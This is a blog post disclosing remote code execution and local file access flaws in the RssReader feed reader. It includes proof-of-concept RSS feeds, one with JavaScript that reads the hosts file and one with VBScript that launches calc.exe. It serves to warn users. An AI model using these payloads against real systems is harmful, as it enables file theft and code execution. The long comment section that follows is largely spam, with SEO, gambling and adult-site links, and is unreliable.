Google Reader is officially shutting down on 1 July 2013. Not everyone has jumped ship yet, so I wouldn't be surprised to see a lot of people suddenly looking for new ways to read their RSS feeds next week.
Summary: Don't install RssReader! It's the top result on Google for "rss reader", but it also lets remote attackers steal your files and run arbitrary code on your computer.
Several years ago, I discovered a remote code execution vulnerability in RssReader, a free RSS reader for Windows. To my amazement, this vulnerability is still present today. Even worse, this software is still the first result when you do a Google search for rss reader. I think this may result in quite a few installations of this vulnerable software next week, after Google Reader shuts down for good.
The latest stable release offered on the RssReader website is 1.0.88.0. This version was originally released way back in 2004! Unfortunately, for the past nine years, this version has contained a remote code execution vulnerability which allows malicious feeds to run arbitrary code on a victim's computer, or access the victim's files without consent.
The RssReader website reports more than 4.1 million downloads, but the real number is likely to be much higher, as that count does not appear to have been updated for more than two years (according to the archived pages at archive.org).
Vulnerability 1: Accessing local files with JavaScript
RssReader executes JavaScript in a context that permits access to local files through an XMLHttpRequest object. An attacker can instantiate an XMLHttpRequest object within a malicious, remote RSS feed and then use it to read any readable file from a victim's computer. The contents of these files can then be transmitted to the remote attacker without the victim's consent or knowledge.
Vulnerability 2: Executing code on the victim's computer with VBScript
Unsurprisingly, RssReader also allows VBScript to be executed in a local context by its rendering engine. A remote attacker can instantiate a WScript.Shell object and use it to execute arbitrary code on the victim's computer. When I originally tested this on a fully-patched Windows XP machine with Internet Explorer 7, it was possible to execute programs merely by viewing a malicious RSS feed. On Windows 7 with IE 10, the user may have to click "Yes" to run the ActiveX control, depending on their security settings.
Proofs of concept
The following RSS document demonstrates how the file c:\windows\system32\drivers\etc\hosts can be accessed through a remote feed.
<rss version="2.0">
<channel>
<title>Title</title>
<link>http://www.example.com/</link>
<description>Description</description>
<generator>highseverity.com</generator>
<item>
<title>Item Title</title>
<link>http://www.example.com/</link>
<description>
<script>
var xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
xmlhttp.open("GET", "file:///c:/windows/system32/drivers/etc/hosts", true);
xmlhttp.onreadystatechange = function() {
if (xmlhttp.readyState == 4) {
alert(xmlhttp.responseText);
}
}
xmlhttp.send(null);
</script>
</description>
<author>highseverity.com</author>
</item>
</channel>
</rss>
When this feed is displayed within RssReader, the contents of the victim's hosts file will be displayed in a JavaScript alert dialog:
An attacker can also use the XMLHttpRequest object to send the contents of this file - plus other potentially sensitive files - to a remote web server. No user interaction is required, so a well-crafted attack is likely to go unnoticed by its victims.
Arbitrary programs can be executed on the victim's computer by creating a WScript.Shell object and calling its Run function. This can be demonstrated by creating a feed with the following script inside an RSS item:
<script language="VBScript">
<!--
Set objShell = CreateObject("WScript.Shell")
objShell.Run "calc.exe", 1, True
-->
</script>
When the victim views this feed, calc.exe will be executed:
As noted earlier, depending on the victim's operating system, browser version and security settings, this code execution vulnerability could also be exploited without requiring any user interaction, and a cleverly crafted attack is unlikely to be noticed by the victim.
Obviously, when a remote attacker is able to run arbitrary code on a victim's computer, it makes it a lot easier to gain unauthorised access to any of the victim's accounts on other sites and services, such as Facebook, Twitter, Gmail, Flickr, etc.
An attacker does not necessarily have to entice his victim into subscribing to a malicious feed; the vulnerability can also be exploited through a feed that the victim has already subscribed to, either by compromising the server hosting the feed, or by writing a specially-crafted blog post which is syndicated by other third-party feeds.
Mitigation
Unfortunately, RssReader does not appear to be maintained any more. The software has not been updated since 2004, the latest bugs listed on the website date from 2003, and emails to info@rssreader.com are being bounced. With that in mind, I'm surprised it's still the top result on Google for rss reader.
So for now, the only sensible thing to do is to avoid installing RssReader, and make sure everyone else avoids it, too!
It might appear reasonable and responsible for Google to place a warning in its search results, or perhaps even reduce its ranking in search results - particularly over the coming weeks.
I m software developer and recently develope a RssReader remote code execution system for custom boxes Australia Brand and get too much benefits.
ReplyDeleteAmazing softwear share is great sharing for informative post. Thanks for sharing. You've get some good and quick services then go for it and get all services them.
ReplyDeleteCustom Packaging solution
The G2 pool cleaner is the best robot pool cleaner for any family pool. Contrast it with other pool cleaners utilizing our Buyers Guide table. Additionally read about the top cleaners and which one is directly for your pool here.
ReplyDeleteWe give you a 12 week home workout plan that works both for men and women which will help you achieve the results you want.
ReplyDeleteDr. Ezekiel Akande is a humanitarian and is keen on clean vitality advancement in Africa particularly as it impacts the basic turn of events. A large portion of his innovative undertakings has been in clean vitality, man-made consciousness, huge information, and lodging improvement.
ReplyDeleteThey effectively communicate service design firms, which supports a productive partnership.
ReplyDeletemobile app design agency
Thank you for posting such a great article! I found your website perfect for my needs. It contains wonderful and helpful posts. Keep up the good work!. Thank you for this wonderful Article! 토토사이트
ReplyDeleteI really like your writing style, great information, thankyou for posting 룰렛
ReplyDeleteYour writing is perfect and complete. 메리트카지노 However, I think it will be more wonderful if your post includes additional topics that I am thinking of. I have a lot of posts on my site similar to your topic. Would you like to visit once?
ReplyDeleteYou are really a genius. I also run a blog, but I don't have genius skills like you. However, I am also writing hard. If possible, please visit my blog and leave a comment. Thank you. 바카라사이트
ReplyDeleteThanks for sharing. I found a lot of interesting information here. A really good post, very thankful and hopeful that you will write many more posts like this one. 야한동영상
ReplyDeletePlease visit once. I leave my blog address below
야설
야한동영상
Great Information sharing .. I am very happy to read this article .. thanks for giving us go through info. Fantastic nice. I appreciate this post. 국산야동
ReplyDeletePlease visit once. I leave my blog address below
야설
국산야동
I read this interesting article. I admire your efforts in writing this essay. I just wanted to express my gratitude for taking the time to offer your ideas and knowledge on this subject.
ReplyDeletehow long does an uncontested divorce take in New Jersey
I am sad about the news that RSS will be shutting down but looking forward to reading new RSS. Cooktop Repair
ReplyDeleteWonderful post. Thank you for updating such an informative content.
ReplyDeleteIn Virginia Protective Order is a legal document issued by a court to provide protection to individuals who have been victims of domestic violence, stalking, sexual assault, or other forms of harm.
this article is really informative and also more information visit on Self Blown
ReplyDeleteUsers of this program should take the RSSReader remote code execution vulnerability very seriously. This vulnerability presents a serious security risk since it might enable malicious actors to run arbitrary code on a victim's system. It emphasizes how crucial it is to rapidly fix vulnerabilities in software applications and keep them updated on a regular basis. Users are strongly recommended to take urgent steps to reduce this risk and ensure the security of their systems, such as installing patches or updates. This incident also serves as a warning for developers to put strong security measures in place during the development process to avoid the emergence of such vulnerabilities in the first place.
ReplyDeletevirginia beach personal injury attorney
Lawyer Wills and Estates
I assume you made certain nice points in features also.
ReplyDeleteI’m really enjoying the design and layout of your site.
ReplyDeleteSome genuinely nice and utilitarian info on this internet site, also I believe the style has great features.
ReplyDelete
ReplyDeleteThanks for the update and quick reply. I’ll be sure to keep an eye on this thread.
Well I truly enjoyed reading it. This subject offered by you is very helpful and accurate.
ReplyDeleteWhat an interesting article! I'm glad i finally found what i was looking for.
ReplyDeleteClarify what high severity means in different contexts, whether it's in software development, cybersecurity, healthcare, or other industries. Explain the significance of identifying and categorizing issues by severity levels.
ReplyDeletelawyers for bankruptcies near me
The RSSReader remote code execution vulnerability poses a critical threat to system security. This flaw allows malicious actors to execute arbitrary code on targeted systems remotely, potentially leading to unauthorized access, data breaches, and system compromise.
ReplyDeleteHow long Can a Divorce Take in New York
cannot assist with providing information or guidance on exploiting security vulnerabilities, including remote code execution vulnerabilities. If you have concerns about a specific software vulnerability, I recommend reaching out to the software vendor or relevant security authorities to report it responsibly. Exploiting vulnerabilities can lead to serious consequences and is against ethical guidelines. If you have any other non-exploitative questions or topics you'd like assistance with, feel free to ask.
ReplyDeleteestate and tax lawyer
You have a very good gloss. Write more high-quality articles. I support you.
ReplyDeleteThank you for the efforts you made in writing this article. Keep Blogging!!
ReplyDeleteI am hoping the same best work from you in the future as well. Its Amazing blog.
ReplyDelete히 수십 년 동안 논의 된 주제로 최신 스핀을 넣었습니다. 멋진 물건, 그냥 멋져요!
ReplyDelete오피
Introducing the Novak Djokovic Lacoste Varsity Jacket at Arsenal Jackets, a perfect blend of sporty elegance and comfort. Inspired by the tennis champion, this jacket features a sleek design that stands out on and off the court. Upgrade your wardrobe with this iconic piece and showcase your love for tennis in style.
ReplyDeleteThis is a crucial topic to discuss! The remote code execution vulnerability in RssReader highlights significant security concerns that users need to be aware of. It’s alarming how vulnerabilities like this can expose systems to potential attacks, emphasizing the importance of regular updates and patch management. I appreciate you bringing attention to this issue, as it’s essential for users to understand the risks associated with the software they use and take proactive measures to protect their data. Thanks for sharing this valuable information—it’s a reminder to stay vigilant in cybersecurity! violation of a protective order virginia
ReplyDeletevirginia federal criminal lawyer
Before traveling, knowing these ten things can make your trip smoother and more enjoyable. First, research your destination’s cultural norms, weather, and safety guidelines. Check passport and visa requirements and keep copies of important documents. Plan a flexible itinerary, allowing time for unexpected discoveries.
ReplyDeleteprotective order virginia firearms
tax and estate lawyer